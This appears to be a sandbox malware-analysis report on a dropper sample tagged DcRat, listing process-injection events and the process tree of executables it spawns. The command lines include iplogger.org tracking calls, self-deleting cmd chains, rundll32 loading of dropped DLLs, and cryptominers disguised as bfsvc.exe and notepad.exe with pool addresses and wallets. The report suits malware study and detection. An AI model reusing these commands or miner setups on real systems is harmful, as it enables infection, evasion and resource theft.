1804 conhost.exe 5336 1CILB33H9E8BCC5.exe 5336 1CILB33H9E8BCC5.exe 1804 conhost.exe 2180 Accostarmi.exe.pif -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exeFiles.exemsedge.exeFolder.exepzyh.exeInstallation.execmd.exemsedge.exedescription pid process target process PID 2680 wrote to memory of 3616 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Files.exe PID 2680 wrote to memory of 3616 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Files.exe PID 2680 wrote to memory of 3616 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Files.exe PID 2680 wrote to memory of 3464 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe KRSetp.exe PID 2680 wrote to memory of 3464 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe KRSetp.exe PID 3616 wrote to memory of 3804 3616 Files.exe File.exe PID 3616 wrote to memory of 3804 3616 Files.exe File.exe PID 3616 wrote to memory of 3804 3616 Files.exe File.exe PID 2680 wrote to memory of 5096 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe msedge.exe PID 2680 wrote to memory of 5096 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe msedge.exe PID 2680 wrote to memory of 3720 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Folder.exe PID 2680 wrote to memory of 3720 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Folder.exe PID 2680 wrote to memory of 3720 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Folder.exe PID 5096 wrote to memory of 4516 5096 msedge.exe msedge.exe PID 5096 wrote to memory of 4516 5096 msedge.exe msedge.exe PID 2680 wrote to memory of 988 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Info.exe PID 2680 wrote to memory of 988 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Info.exe PID 2680 wrote to memory of 988 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Info.exe PID 2680 wrote to memory of 4904 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe File.exe PID 2680 wrote to memory of 4904 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe File.exe PID 2680 wrote to memory of 4904 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe File.exe PID 2680 wrote to memory of 4268 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Install.exe PID 2680 wrote to memory of 4268 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Install.exe PID 2680 wrote to memory of 4268 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Install.exe PID 2680 wrote to memory of 380 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe jg3_3uag.exe PID 2680 wrote to memory of 380 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe jg3_3uag.exe PID 2680 wrote to memory of 380 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe jg3_3uag.exe PID 2680 wrote to memory of 5116 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe pzyh.exe PID 2680 wrote to memory of 5116 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe pzyh.exe PID 2680 wrote to memory of 5116 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe pzyh.exe PID 2680 wrote to memory of 5080 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Installation.exe PID 2680 wrote to memory of 5080 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Installation.exe PID 2680 wrote to memory of 5080 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe Installation.exe PID 2680 wrote to memory of 4636 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe pub2.exe PID 2680 wrote to memory of 4636 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe pub2.exe PID 2680 wrote to memory of 4636 2680 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe pub2.exe PID 3720 wrote to memory of 3296 3720 Folder.exe rUNdlL32.eXe PID 3720 wrote to memory of 3296 3720 Folder.exe rUNdlL32.eXe PID 3720 wrote to memory of 3296 3720 Folder.exe rUNdlL32.eXe PID 5116 wrote to memory of 2716 5116 pzyh.exe jfiag3g_gg.exe PID 5116 wrote to memory of 2716 5116 pzyh.exe jfiag3g_gg.exe PID 5116 wrote to memory of 2716 5116 pzyh.exe jfiag3g_gg.exe PID 5080 wrote to memory of 4924 5080 Installation.exe cmd.exe PID 5080 wrote to memory of 4924 5080 Installation.exe cmd.exe PID 5080 wrote to memory of 4924 5080 Installation.exe cmd.exe PID 4924 wrote to memory of 2300 4924 cmd.exe taskkill.exe PID 4924 wrote to memory of 2300 4924 cmd.exe taskkill.exe PID 4924 wrote to memory of 2300 4924 cmd.exe taskkill.exe PID 3616 wrote to memory of 2768 3616 Files.exe msedge.exe PID 3616 wrote to memory of 2768 3616 Files.exe msedge.exe PID 2768 wrote to memory of 2744 2768 msedge.exe msedge.exe PID 2768 wrote to memory of 2744 2768 msedge.exe msedge.exe PID 5096 wrote to memory of 4864 5096 msedge.exe msedge.exe PID 5096 wrote to memory of 4864 5096 msedge.exe msedge.exe PID 5096 wrote to memory of 4864 5096 msedge.exe msedge.exe PID 5096 wrote to memory of 4864 5096 msedge.exe msedge.exe PID 5096 wrote to memory of 4864 5096 msedge.exe msedge.exe PID 5096 wrote to memory of 4864 5096 msedge.exe msedge.exe PID 5096 wrote to memory of 4864 5096 msedge.exe msedge.exe PID 5096 wrote to memory of 4864 5096 msedge.exe msedge.exe PID 5096 wrote to memory of 4864 5096 msedge.exe msedge.exe PID 5096 wrote to memory of 4864 5096 msedge.exe msedge.exe PID 5096 wrote to memory of 4864 5096 msedge.exe msedge.exe PID 5096 wrote to memory of 4864 5096 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe"C:\Users\Admin\AppData\Local\Temp\4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe"1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji73⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd4,0x10c,0x7ffadc5b46f8,0x7ffadc5b4708,0x7ffadc5b47184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,2055854308275403205,394250286108235205,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,2055854308275403205,394250286108235205,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffadc5b46f8,0x7ffadc5b4708,0x7ffadc5b47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5244 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff752365460,0x7ff752365470,0x7ff7523654804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6284 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6284 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3208 /prefetch:23⤵
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub3⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 6004⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\File.exe"C:\Users\Admin\AppData\Local\Temp\File.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\T0jlrpsGGUYr4eISutfzJGw3.exe"C:\Users\Admin\Documents\T0jlrpsGGUYr4eISutfzJGw3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 4804⤵
- Program crash
-
C:\Users\Admin\Documents\6mM5wc4MNICotg_rhaS83KUX.exe"C:\Users\Admin\Documents\6mM5wc4MNICotg_rhaS83KUX.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 4764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 4964⤵
- Program crash
-
C:\Users\Admin\Documents\vUSKLYkUlN7iZZdPiIOcfRq9.exe"C:\Users\Admin\Documents\vUSKLYkUlN7iZZdPiIOcfRq9.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im vUSKLYkUlN7iZZdPiIOcfRq9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\vUSKLYkUlN7iZZdPiIOcfRq9.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im vUSKLYkUlN7iZZdPiIOcfRq9.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\8LYdi6ebdnfzHFB1_bWgzJGK.exe"C:\Users\Admin\Documents\8LYdi6ebdnfzHFB1_bWgzJGK.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\fhvct4NKRv1MuwyM8AyODJx_.exe"C:\Users\Admin\Documents\fhvct4NKRv1MuwyM8AyODJx_.exe"3⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmmon32\conhost.exe"C:\Windows\System32\cmmon32\conhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\iCvrT7Kt4p0VQnPOaAK1bUuw.exe"C:\Users\Admin\Documents\iCvrT7Kt4p0VQnPOaAK1bUuw.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\3aa92756-575d-46ac-926b-6b220ed24ba3.exe"C:\Users\Admin\AppData\Local\Temp\3aa92756-575d-46ac-926b-6b220ed24ba3.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Users\Admin\Documents\hxK9HRML3gADcksTmKKPtJTV.exe"C:\Users\Admin\Documents\hxK9HRML3gADcksTmKKPtJTV.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 6244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 6324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 6524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 8004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 12444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 12524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 12124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 12444⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "hxK9HRML3gADcksTmKKPtJTV.exe" /f & erase "C:\Users\Admin\Documents\hxK9HRML3gADcksTmKKPtJTV.exe" & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "hxK9HRML3gADcksTmKKPtJTV.exe" /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 11044⤵
- Program crash
-
C:\Users\Admin\Documents\3zrdpp1YNurQ9BvFo_I16hXV.exe"C:\Users\Admin\Documents\3zrdpp1YNurQ9BvFo_I16hXV.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\3zrdpp1YNurQ9BvFo_I16hXV.exe4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵
-
C:\Users\Admin\Documents\xnPfNBTqQGpxzwtTAJgl0Pwi.exe"C:\Users\Admin\Documents\xnPfNBTqQGpxzwtTAJgl0Pwi.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 4804⤵
- Program crash
-
C:\Users\Admin\Documents\xtqmxtTKWEfE8t8uqfXbvBNB.exe"C:\Users\Admin\Documents\xtqmxtTKWEfE8t8uqfXbvBNB.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\eYWJfcyLudf_is8eTK_AhCIG.exe"C:\Users\Admin\Documents\eYWJfcyLudf_is8eTK_AhCIG.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe"C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe4⤵
-
C:\Users\Admin\Documents\QM0VjrM43wjfbjwxlnNpeiLt.exe"C:\Users\Admin\Documents\QM0VjrM43wjfbjwxlnNpeiLt.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\A59L1.exe"C:\Users\Admin\AppData\Local\Temp\A59L1.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\KJAC6.exe"C:\Users\Admin\AppData\Local\Temp\KJAC6.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\BFE5C.exe"C:\Users\Admin\AppData\Local\Temp\BFE5C.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\57F2H.exe"C:\Users\Admin\AppData\Local\Temp\57F2H.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\1CILB.exe"C:\Users\Admin\AppData\Local\Temp\1CILB.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",6⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",8⤵
-
C:\Users\Admin\AppData\Local\Temp\1CILB33H9E8BCC5.exehttps://iplogger.org/1nChi74⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\BJEsf_U8Nn986YcrD7DpuoI2.exe"C:\Users\Admin\Documents\BJEsf_U8Nn986YcrD7DpuoI2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\75BsMTOUWXlbqzaIQpyJ6if7.exe"C:\Users\Admin\Documents\75BsMTOUWXlbqzaIQpyJ6if7.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe"C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe"4⤵
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\notepad.exeC:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov5⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5912 -s 4406⤵
